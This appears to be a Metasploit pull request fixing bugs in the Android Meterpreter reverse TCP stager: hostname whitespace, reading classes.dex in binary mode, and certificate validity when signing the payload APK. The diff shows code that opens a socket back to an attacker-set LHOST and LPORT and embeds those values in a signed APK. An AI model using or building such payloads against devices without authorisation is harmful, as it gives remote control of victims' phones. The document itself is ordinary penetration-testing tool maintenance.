### PR TITLE
Android Meterpreter bugfixes

### DIFF
--- a/external/source/javapayload/androidpayload/app/src/com/metasploit/stage/MainActivity.java
+++ b/external/source/javapayload/androidpayload/app/src/com/metasploit/stage/MainActivity.java
@@ -45,7 +45,7 @@ public class MainActivity extends Activity
 
     private void reverseTCP() {
         try {
-            String lhost = LHOST.substring(4);
+            String lhost = LHOST.substring(4).trim();
             String lport = LPORT.substring(4).trim();
             Socket msgsock = new Socket(lhost, Integer.parseInt(lport));
             DataInputStream in = new DataInputStream(msgsock.getInputStream());

--- a/modules/payloads/stagers/android/reverse_tcp.rb
+++ b/modules/payloads/stagers/android/reverse_tcp.rb
@@ -35,7 +35,7 @@ module Metasploit3
 	def generate_jar(opts={})
 		jar = Rex::Zip::Jar.new
 
-		classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'))
+		classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
 
 		string_sub(classes, '127.0.0.1                       ', datastore['LHOST'].to_s) if datastore['LHOST']
 		string_sub(classes, '4444                            ', datastore['LPORT'].to_s) if datastore['LPORT']
@@ -74,7 +74,7 @@ module Metasploit3
 		# requirement. You can not upload an application if it is signed
 		# with a key whose validity expires before that date.
 		# """
-		cert.not_after = cert.not_before + 3600*24*365*30 # 30 years
+		cert.not_after = cert.not_before + 3600*24*365*20 # 20 years
 
 		jar.sign(key, cert, [cert])
 


### PR DESCRIPTION
- classes.dex gets mangled on windows; use binary mode when reading it
- UnknownHostExceptions on API Level 3 emulator because of trailing
  whitespace after the hostname/IP
- Work around integer overflow at year 2038 when signing the payload
